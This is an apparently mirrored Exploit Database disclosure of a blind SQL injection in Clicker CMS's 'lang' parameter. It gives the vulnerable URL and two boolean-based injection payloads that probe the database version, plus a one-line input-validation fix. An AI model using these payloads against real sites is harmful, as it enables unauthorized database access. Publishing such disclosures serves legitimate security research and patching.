Clicker CMS – Blind SQL Injection

• Exploit Database
• 12 阅读

• 作者： hacker@sr.gov.yu
  日期： 2010-06-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14056/

• # Exploit Title: Clicker CMS Blind SQL Injection Vulnerability
  # Date: 2010-06-25
  # Author: hacker@sr.gov.yu
  # Software Link: n/a
  # Version: n/a
  
  
  ####################################################################
  .:. Author : hacker@sr.gov.yu
  .:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
  .:. Home : www.evilzone.org, www.balcan-security.com
  .:. Script : Clicker CMS
  .:. Bug Type : Blind Sql Injection
  .:. Risk: High
  .:. Tested on : Windows & Linux
  ####################################################################
  
  ===[ Exploit ]===
  
  .:. It was found that Clicker CMS does not validate properly the "lang"
  parameter value.
  
  http://server/index.php?lang=4[BSQLi]
  
  ===[ Example ]===
  
  http://server/index.php?lang=4 and substring(@@version,1,1)=5-- (true or false)
  http://server/index.php?lang=4 and substring(@@version,1,1)=4-- (false or true)
  
  
  ===[ Solution ]===
  
  .:. Input validation of "lang" parameter should be corrected.
  
  
  Greetz to ALL EVILZONE.org && BALCAN-SECURITY.com members!!!
  Pozdrav za sve iz Srbije!!! :-)))